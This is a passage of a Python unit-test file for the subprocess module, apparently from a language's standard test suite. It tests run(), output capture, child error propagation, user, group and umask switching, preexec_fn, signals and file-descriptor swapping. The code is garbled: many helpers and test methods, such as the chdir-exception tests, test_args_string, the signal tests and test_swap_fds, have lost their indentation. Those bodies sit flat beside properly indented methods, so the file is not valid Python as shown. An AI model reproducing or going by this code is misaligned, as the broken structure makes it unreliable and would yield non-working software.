        # output is aliased to stdout
        self.assertEqual(c.exception.stdout, b'BDFL')
    def test_run_kwargs(self):
        newenv = os.environ.copy()
        newenv["FRUIT"] = "banana"
        cp = self.run_python(('import sys, os;'
                              'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
                             env=newenv)
        self.assertEqual(cp.returncode, 33)
    def test_run_with_pathlike_path(self):
        # bpo-31961: test run(pathlike_object)
        # the name of a command that can be run without
        # any arguments that exit fast
        prog = 'tree.com' if mswindows else 'ls'
        path = shutil.which(prog)
        if path is None:
            self.skipTest(f'{prog} required for this test')
        path = FakePath(path)
        res = subprocess.run(path, stdout=subprocess.DEVNULL)
        self.assertEqual(res.returncode, 0)
        with self.assertRaises(TypeError):
            subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
    def test_run_with_bytes_path_and_arguments(self):
        # bpo-31961: test run([bytes_object, b'additional arguments'])
        path = os.fsencode(sys.executable)
        args = [path, '-c', b'import sys; sys.exit(57)']
        res = subprocess.run(args)
        self.assertEqual(res.returncode, 57)
    def test_run_with_pathlike_path_and_arguments(self):
        # bpo-31961: test run([pathlike_object, 'additional arguments'])
        path = FakePath(sys.executable)
        args = [path, '-c', 'import sys; sys.exit(57)']
        res = subprocess.run(args)
        self.assertEqual(res.returncode, 57)
    def test_capture_output(self):
        cp = self.run_python(("import sys;"
                              "sys.stdout.write('BDFL'); "
                              "sys.stderr.write('FLUFL')"),
                             capture_output=True)
        self.assertIn(b'BDFL', cp.stdout)
        self.assertIn(b'FLUFL', cp.stderr)
    def test_stdout_with_capture_output_arg(self):
        # run() refuses to accept 'stdout' with 'capture_output'
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        with self.assertRaises(ValueError,
            msg=("Expected ValueError when stdout and capture_output "
                 "args supplied.")) as c:
            self.run_python("print('will not be run')",
                            capture_output=True, stdout=tf)
        self.assertIn('stdout', c.exception.args[0])
        self.assertIn('capture_output', c.exception.args[0])
    def test_stderr_with_capture_output_arg(self):
        # run() refuses to accept 'stderr' with 'capture_output'
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        with self.assertRaises(ValueError,
            msg=("Expected ValueError when stderr and capture_output "
                 "args supplied.")) as c:
            self.run_python("print('will not be run')",
                            capture_output=True, stderr=tf)
        self.assertIn('stderr', c.exception.args[0])
        self.assertIn('capture_output', c.exception.args[0])
    # This test _might_ wind up a bit fragile on loaded build+test machines
    # as it depends on the timing with wide enough margins for normal situations
    # but does assert that it happened "soon enough" to believe the right thing
    # happened.
    @unittest.skipIf(mswindows, "requires posix like 'sleep' shell command")
    def test_run_with_shell_timeout_and_capture_output(self):
        """Output capturing after a timeout mustn't hang forever on open filehandles."""
        before_secs = time.monotonic()
        try:
            subprocess.run('sleep 3', shell=True, timeout=0.1,
                           capture_output=True)  # New session unspecified.
        except subprocess.TimeoutExpired as exc:
            after_secs = time.monotonic()
            stacks = traceback.format_exc()  # assertRaises doesn't give this.
        else:
            self.fail("TimeoutExpired not raised.")
        self.assertLess(after_secs - before_secs, 1.5,
                        msg="TimeoutExpired was delayed! Bad traceback:\n```\n"
                        f"{stacks}```")
def _get_test_grp_name():
for name_group in ('staff', 'nogroup', 'grp', 'nobody', 'nfsnobody'):
if grp:
try:
grp.getgrnam(name_group)
except KeyError:
continue
return name_group
else:
raise unittest.SkipTest('No identified group name to use for this test on this platform.')
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
    def setUp(self):
        super().setUp()
        # A path guaranteed not to exist; used by the chdir/exec failure
        # tests below to provoke OSError in the child.
        self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
    # We mock the __del__ method for Popen in the next two tests
    # because it does cleanup based on the pid returned by fork_exec
    # along with issuing a resource warning if it still exists. Since
    # we don't actually spawn a process in these tests we can forego
    # the destructor. An alternative would be to set _child_created to
    # False before the destructor is called but there is no easy way
    # to do that
    class PopenNoDestructor(subprocess.Popen):
        """Popen whose destructor is a no-op (no real child was spawned)."""
        def __del__(self):
            pass
    @mock.patch("subprocess._posixsubprocess.fork_exec")
    def test_exception_errpipe_normal(self, fork_exec):
        """Test error passing done through errpipe_write in the good case"""
        def proper_error(*args):
            # args[13] is assumed to be the errpipe_write fd position in
            # fork_exec's argument list — TODO confirm against the current
            # _posixsubprocess.fork_exec signature if this breaks.
            errpipe_write = args[13]
            # Write the hex for the error code EISDIR: 'is a directory'
            err_code = '{:x}'.format(errno.EISDIR).encode()
            os.write(errpipe_write, b"OSError:" + err_code + b":")
            return 0
        fork_exec.side_effect = proper_error
        # waitpid is patched too: no real child exists to reap.
        with mock.patch("subprocess.os.waitpid",
                        side_effect=ChildProcessError):
            with self.assertRaises(IsADirectoryError):
                self.PopenNoDestructor(["non_existent_command"])
    @mock.patch("subprocess._posixsubprocess.fork_exec")
    def test_exception_errpipe_bad_data(self, fork_exec):
        """Test error passing done through errpipe_write where its not
        in the expected format"""
        error_data = b"\xFF\x00\xDE\xAD"
        def bad_error(*args):
            # args[13] is assumed to be the errpipe_write fd position in
            # fork_exec's argument list — TODO confirm if this breaks.
            errpipe_write = args[13]
            # Anything can be in the pipe, no assumptions should
            # be made about its encoding, so we'll write some
            # arbitrary hex bytes to test it out
            os.write(errpipe_write, error_data)
            return 0
        fork_exec.side_effect = bad_error
        # waitpid is patched too: no real child exists to reap.
        with mock.patch("subprocess.os.waitpid",
                        side_effect=ChildProcessError):
            with self.assertRaises(subprocess.SubprocessError) as e:
                self.PopenNoDestructor(["non_existent_command"])
        # The undecodable payload must be surfaced verbatim in the message.
        self.assertIn(repr(error_data), str(e.exception))
    @unittest.skipIf(not os.path.exists('/proc/self/status'),
                     "need /proc/self/status")
    def test_restore_signals(self):
        """restore_signals=True must change the child's ignored-signal mask."""
        # Blindly assume that cat exists on systems with /proc/self/status...
        default_proc_status = subprocess.check_output(
                ['cat', '/proc/self/status'],
                restore_signals=False)
        for line in default_proc_status.splitlines():
            if line.startswith(b'SigIgn'):
                default_sig_ign_mask = line
                break
        else:
            self.skipTest("SigIgn not found in /proc/self/status.")
        restored_proc_status = subprocess.check_output(
                ['cat', '/proc/self/status'],
                restore_signals=True)
        for line in restored_proc_status.splitlines():
            if line.startswith(b'SigIgn'):
                restored_sig_ign_mask = line
                break
        # The two SigIgn lines must differ when signals were restored.
        self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
                            msg="restore_signals=True should've unblocked "
                            "SIGPIPE and friends.")
    def test_start_new_session(self):
        """start_new_session=True gives the child its own session id."""
        # For code coverage of calling setsid().  We don't care if we get an
        # EPERM error from it depending on the test execution environment, that
        # still indicates that it was called.
        try:
            output = subprocess.check_output(
                    [sys.executable, "-c", "import os; print(os.getsid(0))"],
                    start_new_session=True)
        except OSError as e:
            if e.errno != errno.EPERM:
                raise
        else:
            # setsid() succeeded: the child's session must differ from ours.
            parent_sid = os.getsid(0)
            child_sid = int(output)
            self.assertNotEqual(parent_sid, child_sid)
    @unittest.skipUnless(hasattr(os, 'setreuid'), 'no setreuid on platform')
    def test_user(self):
        """The user= parameter switches the child's uid (numeric or name)."""
        # For code coverage of the user parameter.  We don't care if we get an
        # EPERM error from it depending on the test execution environment, that
        # still indicates that it was called.
        uid = os.geteuid()
        # A uid we are (almost certainly) not, plus our own.
        test_users = [65534 if uid != 65534 else 65533, uid]
        name_uid = "nobody" if sys.platform != 'darwin' else "unknown"
        if pwd is not None:
            try:
                pwd.getpwnam(name_uid)
                test_users.append(name_uid)
            except KeyError:
                # unknown user name
                name_uid = None
        for user in test_users:
            # posix_spawn() may be used with close_fds=False
            for close_fds in (False, True):
                with self.subTest(user=user, close_fds=close_fds):
                    try:
                        output = subprocess.check_output(
                                [sys.executable, "-c",
                                 "import os; print(os.getuid())"],
                                user=user,
                                close_fds=close_fds)
                    except PermissionError:  # (EACCES, EPERM)
                        pass
                    except OSError as e:
                        if e.errno not in (errno.EACCES, errno.EPERM):
                            raise
                    else:
                        # Switch succeeded: the child must report the
                        # requested uid.
                        if isinstance(user, str):
                            user_uid = pwd.getpwnam(user).pw_uid
                        else:
                            user_uid = user
                        child_user = int(output)
                        self.assertEqual(child_user, user_uid)
        with self.assertRaises(ValueError):
            subprocess.check_call(ZERO_RETURN_CMD, user=-1)
        with self.assertRaises(OverflowError):
            subprocess.check_call(ZERO_RETURN_CMD,
                                  cwd=os.curdir, env=os.environ, user=2**64)
        # Name lookup requires the pwd module; without it names must fail.
        if pwd is None and name_uid is not None:
            with self.assertRaises(ValueError):
                subprocess.check_call(ZERO_RETURN_CMD, user=name_uid)
@unittest.skipIf(hasattr(os, 'setreuid'), 'setreuid() available on platform')
def test_user_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=65535)
    @unittest.skipUnless(hasattr(os, 'setregid'), 'no setregid() on platform')
    def test_group(self):
        """The group= parameter switches the child's gid (numeric or name)."""
        gid = os.getegid()
        # A gid we are (almost certainly) not a member of.
        group_list = [65534 if gid != 65534 else 65533]
        name_group = _get_test_grp_name()
        if grp is not None:
            group_list.append(name_group)
        for group in group_list + [gid]:
            # posix_spawn() may be used with close_fds=False
            for close_fds in (False, True):
                with self.subTest(group=group, close_fds=close_fds):
                    try:
                        output = subprocess.check_output(
                                [sys.executable, "-c",
                                 "import os; print(os.getgid())"],
                                group=group,
                                close_fds=close_fds)
                    except PermissionError:  # (EACCES, EPERM)
                        pass
                    else:
                        # Switch succeeded: the child must report the
                        # requested gid.
                        if isinstance(group, str):
                            group_gid = grp.getgrnam(group).gr_gid
                        else:
                            group_gid = group
                        child_group = int(output)
                        self.assertEqual(child_group, group_gid)
        # make sure we bomb on negative values
        with self.assertRaises(ValueError):
            subprocess.check_call(ZERO_RETURN_CMD, group=-1)
        with self.assertRaises(OverflowError):
            subprocess.check_call(ZERO_RETURN_CMD,
                                  cwd=os.curdir, env=os.environ, group=2**64)
        # Name lookup requires the grp module; without it names must fail.
        if grp is None:
            with self.assertRaises(ValueError):
                subprocess.check_call(ZERO_RETURN_CMD, group=name_group)
@unittest.skipIf(hasattr(os, 'setregid'), 'setregid() available on platform')
def test_group_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=65535)
    @unittest.skipUnless(hasattr(os, 'setgroups'), 'no setgroups() on platform')
    def test_extra_groups(self):
        """extra_groups= sets the child's supplementary groups."""
        gid = os.getegid()
        group_list = [65534 if gid != 65534 else 65533]
        name_group = _get_test_grp_name()
        perm_error = False
        if grp is not None:
            group_list.append(name_group)
        try:
            output = subprocess.check_output(
                    [sys.executable, "-c",
                     "import os, sys, json; json.dump(os.getgroups(), sys.stdout)"],
                    extra_groups=group_list)
        except OSError as ex:
            # Unprivileged runs may be denied setgroups(); remember that and
            # fall back to checking the groups were simply inherited.
            if ex.errno != errno.EPERM:
                raise
            perm_error = True
        else:
            parent_groups = os.getgroups()
            child_groups = json.loads(output)
        if grp is not None:
            desired_gids = [grp.getgrnam(g).gr_gid if isinstance(g, str) else g
                            for g in group_list]
        else:
            desired_gids = group_list
        if perm_error:
            self.assertEqual(set(child_groups), set(parent_groups))
        else:
            self.assertEqual(set(desired_gids), set(child_groups))
        # make sure we bomb on negative values
        with self.assertRaises(ValueError):
            subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[-1])
        with self.assertRaises(ValueError):
            subprocess.check_call(ZERO_RETURN_CMD,
                                  cwd=os.curdir, env=os.environ,
                                  extra_groups=[2**64])
        # Name lookup requires the grp module; without it names must fail.
        if grp is None:
            with self.assertRaises(ValueError):
                subprocess.check_call(ZERO_RETURN_CMD,
                                      extra_groups=[name_group])
@unittest.skipIf(hasattr(os, 'setgroups'), 'setgroups() available on platform')
def test_extra_groups_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[])
    @unittest.skipIf(mswindows or not hasattr(os, 'umask'),
                     'POSIX umask() is not available.')
    def test_umask(self):
        """The umask= parameter controls the mode of files the child creates."""
        tmpdir = None
        try:
            tmpdir = tempfile.mkdtemp()
            name = os.path.join(tmpdir, "beans")
            # We set an unusual umask in the child so as a unique mode
            # for us to test the child's touched file for.
            subprocess.check_call(
                    [sys.executable, "-c", f"open({name!r}, 'w').close()"],
                    umask=0o053)
            # Ignore execute permissions entirely in our test,
            # filesystems could be mounted to ignore or force that.
            st_mode = os.stat(name).st_mode & 0o666
            # 0o666 default mode & ~0o053 umask == 0o624.
            expected_mode = 0o624
            self.assertEqual(expected_mode, st_mode,
                             msg=f'{oct(expected_mode)} != {oct(st_mode)}')
        finally:
            if tmpdir is not None:
                shutil.rmtree(tmpdir)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals intenum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
    def test_preexec(self):
        """preexec_fn runs in the child between fork and exec."""
        # DISCLAIMER: Setting environment variables is *not* a good use
        # of a preexec_fn.  This is merely a test.
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os;'
                              'sys.stdout.write(os.getenv("FRUIT"))'],
                             stdout=subprocess.PIPE,
                             preexec_fn=lambda: os.putenv("FRUIT", "apple"))
        with p:
            # The env var set by preexec_fn must be visible to the child.
            self.assertEqual(p.stdout.read(), b"apple")
    def test_preexec_exception(self):
        """An exception raised by preexec_fn must surface in the parent."""
        def raise_it():
            raise ValueError("What if two swallows carried a coconut?")
        try:
            p = subprocess.Popen([sys.executable, "-c", ""],
                                 preexec_fn=raise_it)
        except subprocess.SubprocessError as e:
            # With the C _posixsubprocess module the child-side error is
            # wrapped in a SubprocessError.
            self.assertTrue(
                    subprocess._posixsubprocess,
                    "Expected a ValueError from the preexec_fn")
        except ValueError as e:
            # Without the C module the original ValueError propagates.
            self.assertIn("coconut", e.args[0])
        else:
            self.fail("Exception raised by preexec_fn did not make it "
                      "to the parent process.")
    class _TestExecuteChildPopen(subprocess.Popen):
        """Used to test behavior at the end of _execute_child."""
        def __init__(self, testcase, *args, **kwargs):
            # Keep a reference to the running TestCase so the hook
            # in _execute_child can make assertions.
            self._testcase = testcase
            subprocess.Popen.__init__(self, *args, **kwargs)
        def _execute_child(self, *args, **kwargs):
            try:
                subprocess.Popen._execute_child(self, *args, **kwargs)
            finally:
                # Open a bunch of file descriptors and verify that
                # none of them are the same as the ones the Popen
                # instance is using for stdin/stdout/stderr.
                devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
                               for _ in range(8)]
                try:
                    for fd in devzero_fds:
                        self._testcase.assertNotIn(
                            fd, (self.stdin.fileno(), self.stdout.fileno(),
                                 self.stderr.fileno()),
                            msg="At least one fd was closed early.")
                finally:
                    for fd in devzero_fds:
                        os.close(fd)
    @unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
    def test_preexec_errpipe_does_not_double_close_pipes(self):
        """Issue16140: Don't double close pipes on preexec error."""
        def raise_it():
            # Forces _execute_child() down the errpipe_data error path.
            raise subprocess.SubprocessError(
                    "force the _execute_child() errpipe_data path.")
        with self.assertRaises(subprocess.SubprocessError):
            self._TestExecuteChildPopen(
                        self, ZERO_RETURN_CMD,
                        stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                        stderr=subprocess.PIPE, preexec_fn=raise_it)
    def test_preexec_gc_module_failure(self):
        """Popen must restore the gc state it toggles around preexec_fn."""
        # This tests the code that disables garbage collection if the child
        # process will execute any Python.
        def raise_runtime_error():
            raise RuntimeError("this shouldn't escape")
        enabled = gc.isenabled()
        # Save the real gc functions; they are monkeypatched below and
        # must be restored in the finally block no matter what.
        orig_gc_disable = gc.disable
        orig_gc_isenabled = gc.isenabled
        try:
            gc.disable()
            self.assertFalse(gc.isenabled())
            subprocess.call([sys.executable, '-c', ''],
                            preexec_fn=lambda: None)
            self.assertFalse(gc.isenabled(),
                             "Popen enabled gc when it shouldn't.")
            gc.enable()
            self.assertTrue(gc.isenabled())
            subprocess.call([sys.executable, '-c', ''],
                            preexec_fn=lambda: None)
            self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
            # A failing gc.disable() must propagate out of Popen.
            gc.disable = raise_runtime_error
            self.assertRaises(RuntimeError, subprocess.Popen,
                              [sys.executable, '-c', ''],
                              preexec_fn=lambda: None)
            del gc.isenabled  # force an AttributeError
            self.assertRaises(AttributeError, subprocess.Popen,
                              [sys.executable, '-c', ''],
                              preexec_fn=lambda: None)
        finally:
            gc.disable = orig_gc_disable
            gc.isenabled = orig_gc_isenabled
            if not enabled:
                gc.disable()
    @unittest.skipIf(
        sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
    def test_preexec_fork_failure(self):
        """A fork() failure with a preexec_fn must raise cleanly.

        The internal code did not preserve the previous exception when
        re-enabling garbage collection.
        """
        try:
            from resource import getrlimit, setrlimit, RLIMIT_NPROC
        except ImportError as err:
            self.skipTest(err)  # RLIMIT_NPROC is specific to Linux and BSD
        limits = getrlimit(RLIMIT_NPROC)
        [_, hard] = limits
        # Zero process limit: the fork() inside Popen must fail.
        setrlimit(RLIMIT_NPROC, (0, hard))
        self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
        try:
            subprocess.call([sys.executable, '-c', ''],
                            preexec_fn=lambda: None)
        except BlockingIOError:
            # Forking should raise EAGAIN, translated to BlockingIOError
            pass
        else:
            self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
    def _kill_process(self, method, *args):
        """Spawn a long-sleeping child, call Popen.<method>(*args), return it.

        The child writes 'x' once interpreter startup is complete, so the
        signal is only delivered to a fully initialized process.
        """
        # Do not inherit file handles from the parent.
        # It should fix failures on some platforms.
        # Also set the SIGINT handler to the default to make sure it's not
        # being ignored (some tests rely on that.)
        old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
        try:
            p = subprocess.Popen([sys.executable, "-c", """if 1:
                                 import sys, time
                                 sys.stdout.write('x\\n')
                                 sys.stdout.flush()
                                 time.sleep(30)
                                 """],
                                 close_fds=True,
                                 stdin=subprocess.PIPE,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
        finally:
            # Restore the caller's SIGINT handler even if Popen() raised.
            signal.signal(signal.SIGINT, old_handler)
        # Wait for the interpreter to be completely initialized before
        # sending any signal.
        p.stdout.read(1)
        getattr(p, method)(*args)
        return p
    @unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
                     "Due to known OS bug (issue #16762)")
    def _kill_dead_process(self, method, *args):
        """Call Popen.<method>(*args) on a child that has already exited.

        NOTE(review): the skip decorator on this helper takes effect when a
        test calls it — the wrapper raises SkipTest, which unittest treats
        as skipping that test.
        """
        # Do not inherit file handles from the parent.
        # It should fix failures on some platforms.
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                             import sys, time
                             sys.stdout.write('x\\n')
                             sys.stdout.flush()
                             """],
                             close_fds=True,
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        # Wait for the interpreter to be completely initialized before
        # sending any signal.
        p.stdout.read(1)
        # The process should end after this
        time.sleep(1)
        # This shouldn't raise even though the child is now dead
        getattr(p, method)(*args)
        p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
    def check_close_std_fds(self, fds):
        """Run a child with the given standard fds closed; its pipes must work.

        Issue #9905: test that subprocess pipes still work properly with
        some standard fds closed.
        """
        stdin = 0
        saved_fds = self._save_fds(fds)
        # If fd 0 is about to be closed, hand the child the saved duplicate
        # so it still has a usable stdin.
        for fd, saved, inheritable in saved_fds:
            if fd == 0:
                stdin = saved
                break
        try:
            for fd in fds:
                os.close(fd)
            out, err = subprocess.Popen([sys.executable, "-c",
                              'import sys;'
                              'sys.stdout.write("apple");'
                              'sys.stdout.flush();'
                              'sys.stderr.write("orange")'],
                       stdin=stdin,
                       stdout=subprocess.PIPE,
                       stderr=subprocess.PIPE).communicate()
            self.assertEqual(out, b'apple')
            self.assertEqual(err, b'orange')
        finally:
            self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
    def test_small_errpipe_write_fd(self):
        """Issue #15798: Popen should work when stdio fds are available."""
        new_stdin = os.dup(0)
        new_stdout = os.dup(1)
        try:
            os.close(0)
            os.close(1)
            # Side test: if errpipe_write fails to have its CLOEXEC
            # flag set this should cause the parent to think the exec
            # failed. Extremely unlikely: everyone supports CLOEXEC.
            subprocess.Popen([
                    sys.executable, "-c",
                    "print('AssertionError:0:CLOEXEC failure.')"]).wait()
        finally:
            # Restore original stdin and stdout
            os.dup2(new_stdin, 0)
            os.dup2(new_stdout, 1)
            os.close(new_stdin)
            os.close(new_stdout)
    def test_remapping_std_fds(self):
        """The child must cope with std fds supplied in scrambled order."""
        # open up some temporary files
        temps = [tempfile.mkstemp() for i in range(3)]
        try:
            temp_fds = [fd for fd, fname in temps]
            # unlink the files -- we won't need to reopen them
            for fd, fname in temps:
                os.unlink(fname)
            # write some data to what will become stdin, and rewind
            os.write(temp_fds[1], b"STDIN")
            os.lseek(temp_fds[1], 0, 0)
            # move the standard file descriptors out of the way
            saved_fds = self._save_fds(range(3))
            try:
                # duplicate the file objects over the standard fd's
                for fd, temp_fd in enumerate(temp_fds):
                    os.dup2(temp_fd, fd)
                # now use those files in the "wrong" order, so that subprocess
                # has to rearrange them in the child
                p = subprocess.Popen([sys.executable, "-c",
                    'import sys; got = sys.stdin.read();'
                    'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
                    stdin=temp_fds[1],
                    stdout=temp_fds[2],
                    stderr=temp_fds[0])
                p.wait()
            finally:
                self._restore_fds(saved_fds)
            # Rewind and read back what the child wrote to each file.
            for fd in temp_fds:
                os.lseek(fd, 0, 0)
            out = os.read(temp_fds[2], 1024)
            err = os.read(temp_fds[0], 1024).strip()
            self.assertEqual(out, b"got STDIN")
            self.assertEqual(err, b"err")
        finally:
            for fd in temp_fds:
                os.close(fd)
    def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
        """Run a child with std fds mapped to the given permutation of 0-2.

        The three temp files are first dup2()ed over fds 0, 1 and 2, then
        passed to Popen in the requested (possibly swapped) order.
        """
        # open up some temporary files
        temps = [tempfile.mkstemp() for i in range(3)]
        temp_fds = [fd for fd, fname in temps]
        try:
            # unlink the files -- we won't need to reopen them
            for fd, fname in temps:
                os.unlink(fname)
            # save a copy of the standard file descriptors
            saved_fds = self._save_fds(range(3))
            try:
                # duplicate the temp files over the standard fd's 0, 1, 2
                for fd, temp_fd in enumerate(temp_fds):
                    os.dup2(temp_fd, fd)
                # write some data to what will become stdin, and rewind
                os.write(stdin_no, b"STDIN")
                os.lseek(stdin_no, 0, 0)
                # now use those files in the given order, so that subprocess
                # has to rearrange them in the child
                p = subprocess.Popen([sys.executable, "-c",
                    'import sys; got = sys.stdin.read();'
                    'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
                    stdin=stdin_no,
                    stdout=stdout_no,
                    stderr=stderr_no)
                p.wait()
                # Rewind and read back the child's output while the mapping
                # is still in place.
                for fd in temp_fds:
                    os.lseek(fd, 0, 0)
                out = os.read(stdout_no, 1024)
                err = os.read(stderr_no, 1024).strip()
            finally:
                self._restore_fds(saved_fds)
            self.assertEqual(out, b"got STDIN")
            self.assertEqual(err, b"err")
        finally:
            for fd in temp_fds:
                os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
